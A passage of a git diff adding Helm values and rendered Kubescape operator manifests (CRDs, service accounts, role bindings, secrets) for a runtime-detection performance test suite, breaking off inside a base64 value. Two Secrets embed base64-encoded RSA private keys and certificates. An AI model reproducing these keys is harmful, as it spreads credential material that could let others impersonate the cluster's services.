repository: ghcr.io/k8sstormcenter/node-agent + tag: "dev-e64d59a" + config: + maxLearningPeriod: 2m + learningPeriod: 2m + updatePeriod: 10000m + # The Service declares a "prometheus" port (8080) but node-agent's stock + # config disables the exporter. Enable it so the perf_tool's + # KubescapeNodeAgentMetrics recorder can scrape per-node alert/event + # counters. Note: the chart key is the string "enable"/"disable", which + # the chart converts to the JSON `prometheusExporterEnabled` boolean + # in the node-agent ConfigMap. + prometheusExporter: enable + ruleCooldown: + ruleCooldownDuration: 0h + ruleCooldownAfterCount: 1000000000 + ruleCooldownOnProfileFailure: false + ruleCooldownMaxSize: 20000 +capabilities: + runtimeDetection: enable + networkEventsStreaming: disable + # Top-level prometheusExporter capability gate. Both this and + # nodeAgent.config.prometheusExporter must be `enable` for the node-agent + # to bind on port 8080. 
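+  # The rendered node-agent ConfigMap later in this diff shows both gates
+  # taking effect: its config.json carries "prometheusExporterEnabled": true.
+  # One way to spot-check after deploy (assuming the DaemonSet keeps the
+  # chart's default name, node-agent, in the honey namespace):
+  #   kubectl -n honey port-forward ds/node-agent 8080:8080 &
+  #   curl -s localhost:8080/metrics | head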
+ prometheusExporter: enable +alertCRD: + installDefault: true + scopeClustered: true +clusterName: bobexample +ksNamespace: honey +excludeNamespaces: "kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse" diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml new file mode 100644 index 00000000000..392f98dd58f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml @@ -0,0 +1,25 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: storage-auth-reader + namespace: kube-system + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: extension-apiserver-authentication-reader +subjects: +- kind: ServiceAccount + name: storage + namespace: honey diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml new file mode 100644 index 00000000000..1784290193f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml @@ -0,0 +1,4433 @@ +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: operatorcommands.kubescape.io +spec: + group: kubescape.io + names: + plural: operatorcommands + singular: operatorcommand + kind: OperatorCommand + shortNames: + - opcmd + scope: Namespaced + versions: + - name: v1alpha1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + guid: + type: string + commandType: + type: string + commandVersion: + type: string + nullable: true + designators: + type: array + items: + type: object + additionalProperties: true + body: + type: string + format: byte + nullable: true + ttl: + type: string + format: duration + nullable: true + args: + type: object + additionalProperties: true + nullable: true + commandIndex: + type: integer + nullable: true + commandCount: + type: integer + nullable: true + status: + type: object + properties: + started: + type: boolean + startedAt: + type: string + format: date-time + nullable: true + completed: + type: boolean + completedAt: + type: string + format: date-time + nullable: true + executer: + type: string + nullable: true + error: + type: object + nullable: true + properties: + reason: + type: string + nullable: true + message: + type: string + nullable: true + errorCode: + type: integer + nullable: true + payload: + type: string + format: byte + nullable: true + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: rules.kubescape.io +spec: + group: kubescape.io + names: + kind: Rules + listKind: RulesList + plural: rules + singular: rule + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + 
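+    # The schema below also documents field semantics used by the rule
+    # definitions earlier in this diff, e.g. profileDependency is an enum
+    # where 0=Required, 1=Optional, 2=NotRequired.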
schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + rules: + type: array + items: + type: object + properties: + enabled: + type: boolean + description: Whether the rule is enabled + id: + type: string + description: Unique identifier for the rule + name: + type: string + description: Name of the rule + description: + type: string + description: Description of the rule + expressions: + type: object + properties: + message: + type: string + description: Message expression + uniqueId: + type: string + description: Unique identifier expression + ruleExpression: + type: array + items: + type: object + properties: + eventType: + type: string + description: Type of event this expression handles + expression: + type: string + description: The rule expression string + required: + - eventType + - expression + required: + - message + - uniqueId + - ruleExpression + profileDependency: + type: integer + enum: + - 0 + - 1 + - 2 + description: Profile dependency level (0=Required, 1=Optional, + 2=NotRequired) + severity: + type: integer + description: Severity level of the rule + supportPolicy: + type: boolean + description: Whether the rule supports rule policy enforcement + default: false + tags: + type: array + items: + type: string + description: Tags associated with the rule + state: + type: object + additionalProperties: true + description: State information for the rule + agentVersionRequirement: + type: string + description: Agent version requirement to evaluate this rule + (supports semver ranges like ~1.0, >=1.2.0, etc.) + isTriggerAlert: + type: boolean + description: Whether the rule is a trigger alert + default: true + mitreTechnique: + type: string + description: MITRE technique associated with the rule + mitreTactic: + type: string + description: MITRE tactic associated with the rule + required: + - enabled + - id + - name + - description + - expressions + - profileDependency + - severity + - supportPolicy + - isTriggerAlert + - mitreTechnique + - mitreTactic + required: + - rules + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: servicesscanresults.kubescape.io +spec: + group: kubescape.io + names: + kind: ServiceScanResult + plural: servicesscanresults + shortNames: + - kssa + singular: servicescanresult + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + clusterIP: + type: string + ports: + type: array + items: + type: object + properties: + port: + type: integer + protocol: + type: string + sessionLayer: + type: string + presentationLayer: + type: string + applicationLayer: + type: string + authenticated: + type: boolean + nullable: true +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: runtimerulealertbindings.kubescape.io +spec: + group: kubescape.io + names: + kind: RuntimeRuleAlertBinding + plural: runtimerulealertbindings + shortNames: + - rab + singular: runtimerulealertbinding + scope: Cluster + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + namespaceSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: 
array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + podSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + rules: + type: array + items: + type: object + oneOf: + - not: + anyOf: + - required: + - ruleID + - required: + - ruleName + required: + - ruleTags + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleName + required: + - ruleID + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleID + required: + - ruleName + properties: + parameters: + type: object + additionalProperties: true + ruleID: + type: string + ruleName: + type: string + ruleTags: + type: array + items: + type: string + severity: + type: string +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubescape + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubevuln + namespace: honey +automountServiceAccountToken: false +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: operator + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: prometheus-exporter + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + name: storage + namespace: honey + annotations: 
null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: Secret +apiVersion: v1 +metadata: + name: cloud-secret + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: cloud-secret + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: cloud-secret + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/infra: credentials +type: Opaque +data: + account: '' + accessKey: '' +--- +apiVersion: v1 +kind: Secret +metadata: + name: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMzFENjV6WGVoZzBKd0ZIS1pBYXBuNUhtYUwycVdyaE9tVllNTUJPVlVyU2VIdGgwCjZVUHRNbUVXZFhrM2ZCUURUbEtZTWJBVERPMm4vVmdZMnRjRFlhM0ZRUFVNdmlRWHVRN21Ud29kVnJ1YkpKUVkKeldBeWR2aUVRdDk4dlVLeFQ1L2NGT1pyRUs1UGVSeXJjUzNJWHZnQWpMR3J6UlI3RG5kcmtuV0JhTHNVcXp0Ngp6b3E3bjVLSXlndm5yU3YrTCtOejkrb3FRKzB3UWFnTVpoL3FqRDBoR21xS0N2VkhtWUJsRUIvMlgrSGV4UTJXClV5SkV1Tis2L0xWYkpKaktueFZkQlMra0JFL0pXSUFad2xDbDI4Z3FRN1AweDVoK3JldHpqZ2VVemJFUGNORFkKYmhSdUYxOVNzSGM1MlRib2EwWk9jUE1ic3NrbC9kRDdRUkYwQ1FJREFRQUJBb0lCQUNaSWVLcllaa3h1d2NReApnVlBDZktPNVhGbUtZa0RwSmJoTnN3c3U0RU5zYVVyNmFwaHVwNlFpVnJwT3pIODk0dzh6UTVvSkNFc0lGdXRzCmhkNUdTL01iMmh2M3BuYVdNMmJyTWZwTXpwakcwcUxqckpqUXEvWVBSb1U4VU9NVkl0WjJua0VLKzBIQjBDZ0EKRFRmNjFFWExtRFNHWk9Ca2FYQWljdE9KeDJTUGs4RTJxaUJHVEEvSmorNmdOWHJod2V0SndvbW9jRzhsSG1tdQpzYzhnZlJrcnJuR2dmZ1dDWDEwM0czcGRqTGwzT0dtQ0xHRWVnV1ZUKzYzUExncFJnT29vbmkxcFBOdVRlbkpRCks2MFozVWJFVWt2VmJtWXBtMWRGR2hQMDBlZ1VWY3NzK242UEEzUlgwdDRocmpQQnYyYjJQOTVwQVVLOHkwN2kKdGY3bkZEMENnWUVBNWNSaDExSXh4anZDemYrZkJ0OUtNb2NmWjY0LytZVGFFTml1dzlMSk5kT3I4M01FM0wvOQpnTGpTbmsvS2p4eVM5OEV5WFZMSFduSm5yYlBxeWdrYmJvT3Zxejd6UjhWbUZHQURnQzlXMzc3SUJJRzByME54CnZKTnNYeFlXS2RKWm8wMzcrMGFvcUU1VmhSQXZqYTJhUm9QSDdmWVRlcFdoQ0JFMnFNQ2NwS2NDZ1lFQStOQU4KL2pLcndVYktiVXFkb3p3TDdtZ2hJZXpFWG80N1daWks1RHIzMGZhTXhFTU1vekxaOC9VbkVxbk1OUXJZamhaMQppQld2ZGthZXJJUm5DcEZmS2NIKzhlcUdPZWxkNmloa09CekxwWVBYdVVzUGp1VnNwMnlKMllyeTV2Q0pFMnMwCmI0VERiZ2RPVU5RYkFTYmxjK0lmeGdXWTR2TEdDNURwYWpzU1I4OENnWUE2M1VNTHZQMFBna1A0THFMNVNiOWkKam9lWE1tY2xiOG5HUXgwVEFpK1dZTEpPM29yQ1cxV0E0dGppd2lKczQ2OHJWZzJuSnd2M3VoT2h4dFJDQ205QwpzdTRRZTBJc2d3QVIvRDhwV2ZkeHZ4alRQcitobnkvR1ZpYVBmY01UMTlZckpsR0dJS1lZNkdpMGZGOFNkd1Z0ClIxbXpOelhxVStjN2Y5MTNBbEdmUlFLQmdRQ083WDFNUzdGTVdxMEg4VGZ5d0JpZWdDU2dSMUZhZTl2dUQ1Ni8KMG52dm1mQ3RBVk11SUpVQlJnK0c4aEZEV3hLaE5KZVpiOU9XWHVUaGQwRjEyYUpQNjRmWFVnQi9IZVo4RDIzYQpxZmYyQVhHWG1GMjhtV0E4SU9aakdDV0dzaUFjRHBaVmhXOTZNaW96MWxRWTZrNGVyb1BRRGdFUVJhT3NtemJxCmRqcC9Fd0tCZ1FDd2xlZWpEbkpWN3lJY0J0MElLWUtEdFVPS0RINm5ZbFltTUxrWkZtazBsSW1HRGw4cElpRXcKVTFrZ0lVcnZ5VHBmb3QzdFk3NXVFTW5KSGYvSkFHW
kFCNnlHa2dVRzZvRmRQN0N5YUJLMjRSYndUTUk3WmpreQpFUXFvSWVwKzdIUWt6dy9QRzB2VmtZTTQ1KzIrc24renZHeXNYdTVOdFltdEp6cjVFQ3ZicFE9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ== + tls.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURaRENDQWt5Z0F3SUJBZ0lRS0VWZE13bGF5QUU5R2hmeERNRWQzekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1EQXhMakFzQmdOVkJBTVRKV3QxWW1WelkyRndaUzFoWkcxcGMzTnBiMjR0ZDJWaWFHOXZheTVvCmIyNWxlUzV6ZG1Nd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURmVVBybk5kNkcKRFFuQVVjcGtCcW1ma2Vab3ZhcGF1RTZaVmd3d0U1VlN0SjRlMkhUcFErMHlZUloxZVRkOEZBTk9VcGd4c0JNTQo3YWY5V0JqYTF3TmhyY1ZBOVF5K0pCZTVEdVpQQ2gxV3U1c2tsQmpOWURKMitJUkMzM3k5UXJGUG45d1U1bXNRCnJrOTVIS3R4TGNoZStBQ01zYXZORkhzT2QydVNkWUZvdXhTck8zck9pcnVma29qS0MrZXRLLzR2NDNQMzZpcEQKN1RCQnFBeG1IK3FNUFNFYWFvb0s5VWVaZ0dVUUgvWmY0ZDdGRFpaVElrUzQzN3I4dFZza21NcWZGVjBGTDZRRQpUOGxZZ0JuQ1VLWGJ5Q3BEcy9USG1INnQ2M09PQjVUTnNROXcwTmh1Rkc0WFgxS3dkem5aTnVoclJrNXc4eHV5CnlTWDkwUHRCRVhRSkFnTUJBQUdqZ1pNd2daQXdEZ1lEVlIwUEFRSC9CQVFEQWdXZ01CMEdBMVVkSlFRV01CUUcKQ0NzR0FRVUZCd01CQmdnckJnRUZCUWNEQWpBTUJnTlZIUk1CQWY4RUFqQUFNQjhHQTFVZEl3UVlNQmFBRk54aApoU3I0ZmhScnVScFpabnlSWUpRanA1WjhNREFHQTFVZEVRUXBNQ2VDSld0MVltVnpZMkZ3WlMxaFpHMXBjM05wCmIyNHRkMlZpYUc5dmF5NW9iMjVsZVM1emRtTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBQmQ3NXhRV2RaeUQKTVF3a09YSkdBZ1h2VTAxUXh2SmhvMTZZMlVlbjk5T2o2SzBRVjNrRkRnUE15MEo0RHdGdkhiNjhLK0s3YnpuWgoxN1RzTlJwbmQxNDR2OElwUW0rL2JHYThmQkJibnJTeTZJWUZzejZrUkFMdERONXJGM0IzT3JsOE9NMFNna3RYCkNrdVc2ZGNOdXBnOTUyTXNVdDJCL2g5Z2lDbXY4N05VRWZXNUZJOGZ1amtTbktxT2lvSXpKek44NURLSENxOEMKOFZhbFJEMXZ4cDdZK3NRT2dqOTJmY1dXQUlYZDRlZnBkS1dNNHJCWGJhSUVKdGNPK3dNV0dvdU5iY2t3bTQxZQphZkR0V3J1eWx5M1RVRDY1NUpQSDVoZFFnNkFNNlRlNzQ2NGtRUElRSmN1R0R4U1dPTjVJaW5ncjlzTlRGUVhzClc5NlRVWjhDSzU0PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: v1 +kind: Secret +metadata: + name: storage-ca + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.crt: 
LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURjekNDQWx1Z0F3SUJBZ0lSQU1Hd29nRElPWXh1c01nTGNHZnlIR2N3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dKekVsTUNNR0ExVUVBeE1jYzNSdmNtRm5aUzVvYjI1bGVTNXpkbU10ClNVUlRSakJMTkhaa09EQ0NBU0l3RFFZSktvWklodmNOQVFFQkJRQURnZ0VQQURDQ0FRb0NnZ0VCQU5wcWptbk8KaSthZ0FjbkZKY0h5bGRxa1pVdXFMNTZDbThja0t1MlpwV3p5LzF3RlJST1pGL09qQTlaWWl5aUVFc0tqbVpFaQpVRmRNY2FRQ0I1Qm5hSWdzQThUc2dRSXlpNEVLa3MzQUhIME03QXpFc3gxc3ZZRTYrRUkyYmNqUUZqelp5Nm1yClp2OEs5VGhWSVVQMDNDSG1kbkFXbERHN3Mva2VINWE3eEVaSUFIYTBrK3ljVk5uVmtyK1EzVTRwUUpSNUZhU04KMzR3NDcyUWdDc21DcSt3QlA4WjRFT3hsYWszT3hneUpYZ0ZiU0lnaXAwZTgrS1pSVWRxZTJTWXppUVRNYldBQgpVNmJoaDFrZTdGUElMV1VTelQxaGl2N1o4UEc5ZjdSQ1VJTW5JTjY4Z2pHODFIdGkzRFlvOHN2OEFOMlRhcTlQClFWNDBpN3lVMHlvT2VTa0NBd0VBQWFPQm9EQ0JuVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdIUVlEVlIwbEJCWXcKRkFZSUt3WUJCUVVIQXdFR0NDc0dBUVVGQndNQ01Bd0dBMVVkRXdFQi93UUNNQUF3SHdZRFZSMGpCQmd3Rm9BVQpTa0ppbzVsQ3BPYzNGb0YzclR3UkxoMkVhL3N3UFFZRFZSMFJCRFl3TklJUmMzUnZjbUZuWlM1b2IyNWxlUzV6CmRtT0NIM04wYjNKaFoyVXVhRzl1WlhrdWMzWmpMbU5zZFhOMFpYSXViRzlqWVd3d0RRWUpLb1pJaHZjTkFRRUwKQlFBRGdnRUJBRGxpRVJ5ZFF4c2VSSWgyTmgwa2drQldxc2NpbEZpaUxYR1VnV1BkQmtaS1dzNUZ6VS9vSVdpeQo5K2k2aHZxM3ZOOEhCTDdENXg1TldOTU8wa08zUzVDa0NYN2g3ank5UE9IMUowNFRDTmRkQ0I1VzRxWnJyOGhxCjlWa3B5eVFHWTRRRTh1UTBxSzJ4L2M3UGllbXNRbkl0czFpT1llclJVNkJqK1ptSjZxc0J3Ykdab0l0NmQ4ZHEKNWp6MUhQZFZhSDlDVGw4ZkxLSk1ibHJFK2ovU1lsKzUyWWVRNVI1T0IzZ1BZT1JUVHg1dERsSXVVT3JPaXRNbwpyYjNyVDB6WW9TdlRvVmpMM09WYzdrS1QyNm9oNHZ3N2dlS0hVTGYySkpUWEk0MCtUL1RpYWtPRi9odERUWm85CndyMkI0UGw1YWdtbHFoYUQxWHpoQXBnRU9ybktvU2c9Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb0FJQkFBS0NBUUVBMm1xT2FjNkw1cUFCeWNVbHdmS1YycVJsUzZvdm5vS2J4eVFxN1ptbGJQTC9YQVZGCkU1a1g4Nk1EMWxpTEtJUVN3cU9aa1NKUVYweHhwQUlIa0dkb2lDd0R4T3lCQWpLTGdRcVN6Y0FjZlF6c0RNU3oKSFd5OWdUcjRRalp0eU5BV1BObkxxYXRtL3dyMU9GVWhRL1RjSWVaMmNCYVVNYnV6K1I0ZmxydkVSa2dBZHJTVAo3SnhVMmRXU3Y1RGRUaWxBbEhrVnBJM2ZqRGp2WkNBS3lZS3I3QUUveG5nUTdHVnFUYzdHRElsZUFWdElpQ0tuClI3ejRwbEZSMnA3WkpqT0pCTXh0WUFGVHB1R0hXUjdzVThndFpSTE5QV0dLL3RudzhiMS90RUpRZ3ljZzNyeUMKTWJ6VWUyTGNOaWp5eS93QTNaTnFyMDlCWGpTTHZKVFRLZzU1S1FJREFRQUJBb0gvQkVRUWhBQ0V1dnhsREl2TgpNUHlMOExsRlFUVVJ1UWJVQkErd3h2TTVSK2QzRlZVRkJGejVHc2tVU2h0d25GbjRBOVV1S3FlQTZqT1VCS0FGCmhjeC9QaW1kNlRxMVNsV3lZOUxSQ3pPMVdydmw0Rm4zSlp2NkY0d1BUVHZDNlNrblJnajY4VlZuclpPSk5wQnoKRmVDeWEvY1VXUndYeU9EaG92dnpvZjRJMTFhSGJEZWVES0lFdFNXRExmL29jaVBWRWhCcERzdzZzQW5iMDFCdAowK2VlVTczUFordHJGazFKZGVWcnoyVG1MUmJyVnpvNDlJYXJYaGVGRE9yT0s5T24vdkNnbEQ0T2NpRGFtUG14CjhEMzVkY1V6T2tXeWZZY0t0UlBMRDRpU3lKL2NSQnlKQllPQkxydG1BTTZmWEVuSVN3ZEJoLzhrNjlyVkZ0V0cKMlBLUkFvR0JBUGlRcVVIUXNyaHdlODRIbzBTUG5hY3NYT1ByQ3o5Z0ZSTVhCS2IrS210UFljL3dLUlAvZHI4Wgp2S3pPUzlCdFg1eU5ia3ZXUmJZMG5lYUlIN2FFcXV0MENVcUJZYnNSSDg4Wndndi95WmlBUGlyUUdGNXpaT3FyClFVOGRWSkpDNXI0a1VWQ2RBZ2o4QlRobjZIR0RxRW5OTHdjaTNZclAzT1VGWmR6UEg5bWxBb0dCQU9EekNVUjEKZjc0dHRPYzNUNEh2U2lnNk5zVVZRTHFFMUxBUkRseUhEalM5WlRVWFYveVUyNFFxc2NIaFRIQmhYUytNeXJoKwpWMGZrVXNwdlUxRk45OW5Zb3p0KzVYVlpHTVpJR3JHS2FYRHg1Z2p1czJ2bVdjY05MMXk1WnVFMkgyaFZkVjM0Cm45c00yWDRxSUhpelRHWWFGUk95dFllT1pFTXVxUWFwREtJMUFvR0FCZE5lSkN6QUE1S2ZWRFRabnNHKzhDd2EKQVQyQkJmczZnemdHNCtNUkczTEEyQjdJMTY4bEdWV0JGb3UvT3lOVkdsWTJQNURHRVg4cU5EejhnVXFhdHVvQgpUYjI2aktmYUZ3Q0RpOFJ5OVNBTVZQU0xuYXNXc21sUkhvbVJjZHdmakZWTmtwWWJkaHB5Qk9CcWtqNkRzemNiCjR3N3VJbEs4MnFGRndlY1kyQUVDZ1lCTHR5STRhOEE2bUJIYS9aQUNjVE9weEtab3dkV09zbVVRZWowMlFiTXoKWjBob2pWbnRSNEYzeEJNZTZpR2JkZm95cGhZWjhWU1pleTJ1dTdmMGx1VEU2NWxOemxHWHBReWt1T0piUGZadApzTTQ
zMVhpSTZmanYrZTBtTGJXR09ueHAxdEh4ZGwwQUV4d2x6akl0emxQNXplK29PSy9IVjlOQmxiUUk3TisyCnZRS0JnSEhrbDVPcDhkVWdkYTNzS0lLNzduK0JwUUJrcWdsQ1dMTkdkZFhOLyt2MUVpU01XUFNQOGdqa2xPb1gKYkRWUUVCSS9XVERXdUE2Nno2WEVLWHJjWkJRRWtUdjR2TWNFUmozSEloVWNoNDVBNnArZmc1RlhrOVFZQUVpcgoyUGYyUmU1elNhL0JvY0NjN3FFL1BtZjBNVjdzT0FXaWdsemFNeEVRTjUzaXdGd2IKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K + ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPa